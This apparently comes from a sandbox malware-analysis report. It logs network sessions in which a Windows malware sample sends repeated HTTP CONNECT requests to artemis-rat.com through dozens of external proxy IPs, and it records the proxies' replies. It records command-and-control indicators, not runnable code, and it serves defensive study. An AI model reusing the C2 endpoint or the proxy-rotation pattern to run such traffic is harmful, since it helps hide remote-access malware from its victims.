                                              Mar 11, 2024 08:39:19.585017920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              569192.168.2.451626193.239.56.8480817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.444597960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              570192.168.2.45199843.153.3.2414437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.445633888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              571192.168.2.45200043.153.3.2414437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.446211100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              572192.168.2.45200243.153.3.2414437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.447226048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              573192.168.2.45200443.153.3.2414437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.448240995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              574192.168.2.451613103.118.47.24380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.457170010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              575192.168.2.45177172.167.38.7456507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.458074093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.906214952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.554007053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.554003000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.497301102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.569061041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645407915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.663453102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.460267067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              576192.168.2.45159543.231.22.228807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.458861113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              577192.168.2.45166913.40.239.13031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.459593058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.833616018 CET65INHTTP/1.1 200 Connection Established
                                              Content-Type: text/plain


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              578192.168.2.451633177.135.83.24456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.461412907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              579192.168.2.451806162.159.241.160807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.469512939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.630672932 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              580192.168.2.451534117.160.250.16388287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.469573021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.085496902 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Connection: close
                                              Cache-Control: no-store
                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              581192.168.2.451825172.67.182.145807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.470571995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.625183105 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              582192.168.2.451827172.67.182.38807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.471875906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.626501083 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              583192.168.2.450173110.34.3.22931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.474373102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553945065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.441469908 CET525INHTTP/1.1 502 Proxy Error
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1o
                                              Content-Length: 348
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              584192.168.2.4518481.0.0.84807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.481724977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.636137962 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              585192.168.2.451615110.164.132.23680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.485861063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.241174936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.664086103 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              586192.168.2.451663200.174.198.9588887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.501027107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.942828894 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              587192.168.2.451889172.64.86.217807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.515671968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.669994116 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              588192.168.2.451917104.18.81.76807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.524128914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.678550005 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              589192.168.2.45214846.22.210.1844437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.528413057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              590192.168.2.4516905.58.239.21080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.529213905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.875238895 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              591192.168.2.45215046.22.210.1844437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.529220104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              592192.168.2.451928104.20.178.166807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.529500008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.684212923 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              593192.168.2.45215246.22.210.1844437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.530348063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              594192.168.2.45215446.22.210.1844437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
